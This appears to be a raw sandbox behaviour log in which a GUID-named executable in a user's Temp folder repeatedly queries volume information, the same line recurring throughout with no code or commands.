Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Queries volume information: unknown VolumeInformation
